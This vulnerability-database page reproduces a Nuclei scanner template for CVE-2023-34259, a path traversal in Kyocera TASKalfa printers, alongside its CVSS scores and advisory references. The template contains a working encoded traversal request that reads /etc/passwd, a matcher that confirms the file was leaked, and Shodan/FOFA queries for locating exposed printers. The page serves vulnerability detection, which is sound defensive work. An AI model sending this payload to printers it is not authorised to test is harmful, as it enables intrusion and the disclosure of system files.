ProjectDiscoveryNUCLEI:CVE-2023-34259Kyocera TASKalfa printer - Path Traversal
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
73.3%
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
id: CVE-2023-34259
info:
name: Kyocera TASKalfa printer - Path Traversal
author: gy741
severity: medium
description: |
CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
- https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
- https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
- https://sec-consult.com/vulnerability-lab/
- https://seclists.org/fulldisclosure/2023/Jul/15
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
cvss-score: 4.9
cve-id: CVE-2023-34259
cwe-id: CWE-22
epss-score: 0.00559
epss-percentile: 0.77589
cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: kyocera
product: d-copia253mf_plus_firmware
shodan-query: http.favicon.hash:-50306417
fofa-query: icon_hash=-50306417
tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer
http:
- method: GET
path:
- "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: server
words:
- "KM-MFP"
- type: status
status:
- 200
# digest: 4a0a004730450220565b9c37b53169915914ce76aa88eda5c5c85f6f97f130b384923bb32f87173f022100f64be4191c6db18ae4d2c6447f91bd5a10dd17c89ffed7373b4c903b24da0ed4:922c64590222798bb761d5b6d8e72950References
packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
sec-consult.com/vulnerability-lab/
sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
seclists.org/fulldisclosure/2023/Jul/15
www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
Related
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
73.3%